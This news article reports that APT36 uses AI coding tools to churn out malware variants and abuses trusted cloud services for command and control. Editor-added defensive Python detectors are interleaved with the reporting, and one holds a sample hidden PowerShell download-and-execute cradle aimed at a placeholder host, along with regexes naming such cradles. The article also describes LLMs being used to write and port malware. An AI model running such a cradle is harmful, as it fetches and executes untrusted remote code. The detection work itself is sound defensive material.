Hackers Now Using AI to Create Malware Faster, Security Researchers Warn

Pakistan-Linked Hackers Turn to AI to Produce Large Volumes of Malware

A cyber-espionage group believed to be aligned with Pakistan, commonly tracked as Transparent Tribe (APT36), has begun using artificial intelligence coding tools to accelerate the development of malware used in cyber attacks.

Security researchers report that the group is generating large numbers of malicious programs using AI-assisted development tools. Instead of building highly sophisticated malware, the attackers are producing many different variants quickly, hoping that some will bypass security defenses.

Researchers from Bitdefender say this approach allows attackers to create a large volume of disposable malware implants using programming languages that are not widely used in traditional malware development.

Attackers Using Less Common Programming Languages

One unusual element of the campaign is the use of lesser-known programming languages such as:

  • Nim
  • Zig
  • Crystal

These languages are rarely used in typical malware operations, which often rely on more common languages like C++ or Python.

The attackers are also relying on legitimate online platforms for communication and data transfer. Services observed in the campaign include:

  • Slack
  • Discord
  • Supabase
  • Google Sheets
  • Firebase
  • Google Drive

Because these platforms are widely trusted and commonly used by organizations, malicious traffic may blend in with normal network activity, making detection more difficult.
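One defensive answer to this blending problem is to judge trusted-service traffic by the process that generates it rather than by the destination alone. The following is an added example, not code from the article or from Bitdefender's research: it flags connections to the services named above when they come from a process that is not a browser or the vendor's own client. The hostnames, the expected-client lists and the sample events are the editor's assumptions and constructed data.

```python
# Hostnames for the services named above. The article names the platforms,
# not the domains, so this mapping is the editor's assumption.
SERVICE_DOMAINS = {
    "slack":    ("slack.com",),
    "discord":  ("discord.com", "discordapp.com", "discord.gg"),
    "supabase": ("supabase.co",),
    "gsheets":  ("sheets.googleapis.com",),
    "firebase": ("firebaseio.com", "firebasestorage.googleapis.com"),
    "gdrive":   ("drive.google.com", "www.googleapis.com"),
}

# Processes expected to reach each service on a workstation. Supabase and
# Firebase are backend APIs with no desktop client, so any process reaching
# them directly from a user endpoint is worth a look.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
EXPECTED_CLIENTS = {
    "slack":    BROWSERS | {"slack.exe"},
    "discord":  BROWSERS | {"discord.exe"},
    "supabase": set(),
    "gsheets":  BROWSERS,
    "firebase": BROWSERS,
    "gdrive":   BROWSERS | {"googledrivefs.exe"},
}

def classify_host(host):
    """Map a destination hostname to a service family, or None."""
    host = host.lower().rstrip(".")
    for service, domains in SERVICE_DOMAINS.items():
        if any(host == d or host.endswith("." + d) for d in domains):
            return service
    return None

def flag_connections(events):
    """Return (process, host, service) for trusted-service traffic from
    a process that is not an expected client of that service."""
    hits = []
    for e in events:
        service = classify_host(e["dest_host"])
        process = e["process"].lower().rsplit("\\", 1)[-1]
        if service and process not in EXPECTED_CLIENTS[service]:
            hits.append((process, e["dest_host"], service))
    return hits

# Constructed endpoint network events (process -> destination), not real data.
SAMPLE_EVENTS = [
    {"process": r"C:\Users\u\AppData\Local\slack\slack.exe", "dest_host": "wss-primary.slack.com"},
    {"process": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "dest_host": "discord.com"},
    {"process": r"C:\Users\u\AppData\Local\Temp\invoice_viewer.exe", "dest_host": "abcd1234.supabase.co"},
    {"process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "dest_host": "sheets.googleapis.com"},
]

if __name__ == "__main__":
    for hit in flag_connections(SAMPLE_EVENTS):
        print(hit)  # the two non-browser, non-client processes
```

In practice the expected-client sets should be built from each organization's own baseline of which binaries normally reach these services.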

AI Helping Lower the Barrier for Cybercrime

Large language models (LLMs) are believed to play a role in generating much of the code used in these attacks. These AI systems allow threat actors to quickly produce working code even in programming languages they may not normally know.

According to security researchers, attackers can use AI to:

  • Write new malware from scratch
  • Convert existing malware into other programming languages
  • Rapidly produce multiple versions of the same tool

This capability reduces the technical skill required to create malware and allows attackers to scale operations faster.

A New Strategy: “Distributed Denial of Detection”

Bitdefender researchers describe this strategy as Distributed Denial of Detection (DDoD).

Instead of focusing on building advanced stealth malware, the attackers create a large number of different malware files. Each file may use different programming languages, communication protocols, or infrastructure.

The goal is simple: overwhelm security systems with many variants so that traditional detection methods struggle to keep up.

Targets: Governments, Embassies, and Businesses

The campaign appears to focus mainly on Indian government organizations and diplomatic missions located abroad.

Investigators also found evidence that the group has targeted:

  • Afghan government institutions
  • Private companies in the region

The attackers reportedly use LinkedIn to identify and research potential targets before launching phishing campaigns.

Phishing Emails Used to Start the Infection

Most of the attacks begin with phishing emails designed to trick victims into opening malicious files.

Common methods used include:

  • ZIP archives containing Windows shortcut (LNK) files
  • ISO disk images containing malware
  • PDF documents that include a fake “Download Document” button

If a victim clicks the malicious file, it triggers hidden PowerShell commands that download and run malware directly in memory.
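The infection step just described, as an added detection example that is not part of the article or of Bitdefender's research: it scores Sysmon-style process-creation events for PowerShell that was spawned by a file double-click and carries the command-line traits of download-and-execute-in-memory behaviour. Field names follow Sysmon Event ID 1; the indicator list, weights, sample events and placeholder URL are the editor's constructions.

```python
import re

# PowerShell spawned by explorer.exe usually means a user double-clicked a
# file (the LNK-from-ZIP and mounted-ISO cases above).
USER_LAUNCH_PARENTS = {"explorer.exe"}

# Command-line traits of PowerShell that fetches and runs code without
# writing an executable to disk; each hit adds weight.
IN_MEMORY_INDICATORS = {
    "hidden window":     r"-w(?:indowstyle)?\s+hidden",
    "no profile":        r"-nop(?:rofile)?\b",
    "invoke-expression": r"\biex\b|invoke-expression",
    "web download":      r"downloadstring|downloaddata|invoke-webrequest|\biwr\b",
    "reflective load":   r"frombase64string|\[reflection\.assembly\]::load",
}

def score_event(event):
    """Return (score, reasons) for one Sysmon-style process-creation event."""
    image = event["Image"].lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    cmd = event["CommandLine"].lower()
    parent = event["ParentImage"].lower().rsplit("\\", 1)[-1]
    reasons = [n for n, p in IN_MEMORY_INDICATORS.items() if re.search(p, cmd)]
    score = 2 * len(reasons)
    if score and parent in USER_LAUNCH_PARENTS:  # cradle launched by a file click
        reasons.append(f"spawned by {parent} (file double-click)")
        score += 3
    return score, reasons

def detect(events, threshold=5):
    """Return [(pid, score, reasons)] for events at or above threshold."""
    scored = [(e["ProcessId"], *score_event(e)) for e in events]
    return [hit for hit in scored if hit[1] >= threshold]

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # admin runs a maintenance script from a console: benign
        "ProcessId": 4101, "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -File C:\ops\rotate-logs.ps1"},
    {   # LNK double-clicked from an extracted ZIP: hidden in-memory cradle
        "ProcessId": 5230, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('https://placeholder.invalid/s')\""},
]

if __name__ == "__main__":
    for pid, score, reasons in detect(SAMPLE_EVENTS):
        print(pid, score, reasons)  # 5230 11 [...]
```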

Malware Tools Used in the Campaign

Researchers identified several custom malware tools used by the group, including:

Warcode

A shellcode loader written in Crystal that loads a Havoc command-and-control agent directly into memory.

NimShellcodeLoader

A Nim-based loader used to deploy Cobalt Strike beacons.

CreepDropper

A .NET malware loader responsible for installing additional tools such as:

  • SHEETCREEP – a Go-based information stealer that uses the Microsoft Graph API
  • MAILCREEP – a backdoor that communicates through Google Sheets

SupaServ

A Rust-based backdoor that communicates through the Supabase platform, with Firebase used as a backup channel.

LuminousStealer

An information-stealing malware written in Rust that uploads stolen files to Firebase and Google Drive.

CrystalShell and ZigShell

Cross-platform backdoors capable of running on Windows, Linux, and macOS, using platforms like Discord or Slack for command-and-control communication.

LuminousCookies

A specialized tool designed to steal browser data such as cookies, saved passwords, and payment information from Chromium-based browsers.

BackupSpy

A surveillance tool that monitors local files and removable drives for sensitive information.

ZigLoader

A loader that decrypts and executes shellcode directly in memory.

Gate Sentinel Beacon

A modified version of the GateSentinel command-and-control framework.

AI-Generated Malware May Be Less Stable

Although AI is helping attackers produce malware faster, researchers note that many of the samples show signs of instability and coding mistakes.

Security experts say the group appears to be relying more on volume than quality. Many of the tools contain logical errors or poor coding practices, suggesting they were generated quickly using automated tools.

The Bigger Cybersecurity Concern

While individual malware samples may not be highly sophisticated, the real danger lies in scale.

AI allows attackers to rapidly generate new malware variants and deploy them in large numbers. This makes it easier for threat actors to test many different approaches until one successfully bypasses security defenses.

Researchers warn that the combination of AI-generated malware, uncommon programming languages, and trusted cloud services could make future cyber attacks harder to detect.